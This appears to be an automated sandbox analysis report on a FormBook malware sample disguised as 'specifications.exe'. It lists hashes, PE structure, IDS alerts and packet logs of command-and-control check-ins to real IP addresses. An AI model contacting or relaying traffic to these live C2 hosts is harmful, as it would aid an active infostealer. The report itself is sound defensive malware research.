                                                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\sE716IK71M

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Entropy (8bit):7.7651601110363675
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                File name:specifications.exe
                                                                                                                                                                                File size:882'688 bytes
                                                                                                                                                                                MD5:8f233b98037a9f801c3977afe32776a6
                                                                                                                                                                                SHA1:f4f49244fc94081d79f2f16802441872fa509fb7
                                                                                                                                                                                SHA256:56074e8ad9bd7ee8b56c2bbd5c826c7bbcb1819dd0145c7a2733b8ce3d78938e
                                                                                                                                                                                SHA512:e2a7db0f019e4689264fe4654092bc1d46c5efbe99a4951008a70b3493e967d0a90b07c5cafab26589723015d43822671cab2d9133eb05b96f132cba3d8b9bdd
                                                                                                                                                                                SSDEEP:12288:aiXy5jNJEaGeoZcwzA4aqMdcTxyzHJNxGNiAnGLBMIU648lrOto1zGksv+SGjpAg:as400ojA9qjTxyzHzxu76ZB1zGUxj
                                                                                                                                                                                TLSH:3F15E0883610B59FC497C9718A68DDB8A6606CBB970BC303E1D72DEFB91D597DE001E2
                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&................0..H...........g... ........@.. ....................................@................................

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:323636b29699c72c

                                                                                                                                                                                Static PE Info

                                                                                                                                                                                General

                                                                                                                                                                                Entrypoint:0x4d679e
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                Time Stamp:0x91062694 [Wed Feb 6 20:56:52 2047 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                Instruction
                                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                                Data Directories

                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xd67500x4b.text
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xd80000x2a08.rsrc
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xdc0000xc.reloc
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                Sections

                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                .text0x20000xd47a40xd48001327b2f7f0008c0129bb7b92fbb70024False0.8931123621323529data7.769913343213509IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .rsrc0xd80000x2a080x2c00d9b5d9e2ab2d11107a8823a55bbff8daFalse0.8745561079545454data7.486085144809475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .reloc0xdc0000xc0x20025d699c7bd98ecc3a8178b45a8111934False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                Resources

                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                RT_ICON0xd81300x244fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9797740720817644
                                                                                                                                                                                RT_GROUP_ICON0xda5800x14data1.05
                                                                                                                                                                                RT_VERSION0xda5940x288data0.46296296296296297
                                                                                                                                                                                RT_MANIFEST0xda81c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                Imports

                                                                                                                                                                                DLLImport
                                                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                                                Network Behavior

                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                2024-11-29T09:15:53.450775+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974123.225.159.4280TCP
                                                                                                                                                                                2024-11-29T09:16:11.372591+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449764156.232.181.15580TCP
                                                                                                                                                                                2024-11-29T09:16:14.076000+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449770156.232.181.15580TCP
                                                                                                                                                                                2024-11-29T09:16:16.857724+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449775156.232.181.15580TCP
                                                                                                                                                                                2024-11-29T09:16:19.613328+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449786156.232.181.15580TCP
                                                                                                                                                                                2024-11-29T09:16:26.546324+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449802185.27.134.20680TCP
                                                                                                                                                                                2024-11-29T09:16:29.258911+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449808185.27.134.20680TCP
                                                                                                                                                                                2024-11-29T09:16:31.874002+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449814185.27.134.20680TCP
                                                                                                                                                                                2024-11-29T09:16:34.787530+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449820185.27.134.20680TCP
                                                                                                                                                                                2024-11-29T09:16:51.342534+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449860104.21.90.13780TCP
                                                                                                                                                                                2024-11-29T09:16:54.018391+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449866104.21.90.13780TCP
                                                                                                                                                                                2024-11-29T09:16:56.777531+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449872104.21.90.13780TCP
                                                                                                                                                                                2024-11-29T09:16:59.487231+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449880104.21.90.13780TCP
                                                                                                                                                                                2024-11-29T09:17:06.465787+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449896209.74.77.10780TCP
                                                                                                                                                                                2024-11-29T09:17:09.251168+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449903209.74.77.10780TCP
                                                                                                                                                                                2024-11-29T09:17:12.133236+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449911209.74.77.10780TCP
                                                                                                                                                                                2024-11-29T09:17:14.845228+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449917209.74.77.10780TCP
                                                                                                                                                                                2024-11-29T09:17:21.791971+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449933176.32.38.13080TCP
                                                                                                                                                                                2024-11-29T09:17:24.445342+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449939176.32.38.13080TCP
                                                                                                                                                                                2024-11-29T09:17:27.059744+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449947176.32.38.13080TCP
                                                                                                                                                                                2024-11-29T09:17:29.731036+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449952176.32.38.13080TCP
                                                                                                                                                                                2024-11-29T09:17:36.629843+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449966161.97.168.24580TCP
                                                                                                                                                                                2024-11-29T09:17:39.272034+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449972161.97.168.24580TCP
                                                                                                                                                                                2024-11-29T09:17:41.927368+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449977161.97.168.24580TCP
                                                                                                                                                                                2024-11-29T09:17:44.585535+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449983161.97.168.24580TCP
                                                                                                                                                                                2024-11-29T09:17:52.685236+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450002103.75.185.2280TCP
                                                                                                                                                                                2024-11-29T09:17:55.341486+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450007103.75.185.2280TCP
                                                                                                                                                                                2024-11-29T09:17:58.013935+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450012103.75.185.2280TCP
                                                                                                                                                                                2024-11-29T09:18:00.879697+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450017103.75.185.2280TCP
                                                                                                                                                                                2024-11-29T09:18:07.842523+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450018155.94.253.480TCP
                                                                                                                                                                                2024-11-29T09:18:10.558205+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450019155.94.253.480TCP
                                                                                                                                                                                2024-11-29T09:18:13.133640+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450020155.94.253.480TCP
                                                                                                                                                                                2024-11-29T09:18:15.858592+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450021155.94.253.480TCP
                                                                                                                                                                                2024-11-29T09:18:22.885892+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450022208.91.197.2780TCP
                                                                                                                                                                                2024-11-29T09:18:25.453892+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450023208.91.197.2780TCP
                                                                                                                                                                                2024-11-29T09:18:28.111233+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024208.91.197.2780TCP
                                                                                                                                                                                2024-11-29T09:18:31.437921+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450025208.91.197.2780TCP
                                                                                                                                                                                2024-11-29T09:18:38.930551+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450026217.160.0.20080TCP
                                                                                                                                                                                2024-11-29T09:18:41.675299+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450027217.160.0.20080TCP
                                                                                                                                                                                2024-11-29T09:18:44.336008+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450028217.160.0.20080TCP
                                                                                                                                                                                2024-11-29T09:18:47.005824+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450029217.160.0.20080TCP
                                                                                                                                                                                2024-11-29T09:18:55.030408+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450030154.70.82.24680TCP
                                                                                                                                                                                2024-11-29T09:18:57.685346+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450031154.70.82.24680TCP
                                                                                                                                                                                2024-11-29T09:19:00.357354+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450032154.70.82.24680TCP
                                                                                                                                                                                2024-11-29T09:19:03.384246+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450033154.70.82.24680TCP
                                                                                                                                                                                2024-11-29T09:19:10.465837+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450034172.67.216.17380TCP

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Nov 29, 2024 09:15:52.078969955 CET4974180192.168.2.423.225.159.42
                                                                                                                                                                                Nov 29, 2024 09:15:52.198832035 CET804974123.225.159.42192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:15:52.198920012 CET4974180192.168.2.423.225.159.42
                                                                                                                                                                                Nov 29, 2024 09:15:52.209532976 CET4974180192.168.2.423.225.159.42
                                                                                                                                                                                Nov 29, 2024 09:15:52.329401016 CET804974123.225.159.42192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:15:53.399683952 CET804974123.225.159.42192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:15:53.450774908 CET4974180192.168.2.423.225.159.42
                                                                                                                                                                                Nov 29, 2024 09:15:53.473182917 CET804974123.225.159.42192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:15:53.473397970 CET4974180192.168.2.423.225.159.42
                                                                                                                                                                                Nov 29, 2024 09:15:53.474935055 CET4974180192.168.2.423.225.159.42
                                                                                                                                                                                Nov 29, 2024 09:15:53.594789982 CET804974123.225.159.42192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:09.735058069 CET4976480192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:09.855469942 CET8049764156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:09.855628014 CET4976480192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:09.869949102 CET4976480192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:09.989803076 CET8049764156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:11.372591019 CET4976480192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:11.492994070 CET8049764156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:11.493110895 CET4976480192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:12.429816961 CET4977080192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:12.549906015 CET8049770156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:12.550009012 CET4977080192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:12.570077896 CET4977080192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:12.689934969 CET8049770156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:14.075999975 CET4977080192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:14.196242094 CET8049770156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:14.196443081 CET4977080192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:15.179759026 CET4977580192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:15.299746990 CET8049775156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:15.299817085 CET4977580192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:15.338232040 CET4977580192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:15.458420038 CET8049775156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:15.458434105 CET8049775156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:15.458570957 CET8049775156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:15.458605051 CET8049775156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:15.458764076 CET8049775156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:15.458774090 CET8049775156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:15.458847046 CET8049775156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:15.458857059 CET8049775156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:15.458919048 CET8049775156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:16.857723951 CET4977580192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:16.977883101 CET8049775156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:16.977988005 CET4977580192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:17.876491070 CET4978680192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:17.999453068 CET8049786156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:17.999562979 CET4978680192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:18.009052992 CET4978680192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:18.129103899 CET8049786156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:19.613151073 CET8049786156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:19.613276005 CET8049786156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:19.613327980 CET4978680192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:19.616122007 CET4978680192.168.2.4156.232.181.155
                                                                                                                                                                                Nov 29, 2024 09:16:19.736057043 CET8049786156.232.181.155192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:25.129596949 CET4980280192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:25.249535084 CET8049802185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:25.249694109 CET4980280192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:25.264139891 CET4980280192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:25.384076118 CET8049802185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:26.546080112 CET8049802185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:26.546257973 CET8049802185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:26.546324015 CET4980280192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:26.782593012 CET4980280192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:27.797614098 CET4980880192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:27.917596102 CET8049808185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:27.917691946 CET4980880192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:27.933073044 CET4980880192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:28.053023100 CET8049808185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:29.258795023 CET8049808185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:29.258821964 CET8049808185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:29.258910894 CET4980880192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:29.435187101 CET4980880192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:30.455538034 CET4981480192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:30.575506926 CET8049814185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:30.575606108 CET4981480192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:30.590215921 CET4981480192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:30.710340023 CET8049814185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:30.710359097 CET8049814185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:30.710370064 CET8049814185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:30.710432053 CET8049814185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:30.710606098 CET8049814185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:30.710701942 CET8049814185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:30.710714102 CET8049814185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:30.710727930 CET8049814185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:30.710741997 CET8049814185.27.134.206192.168.2.4
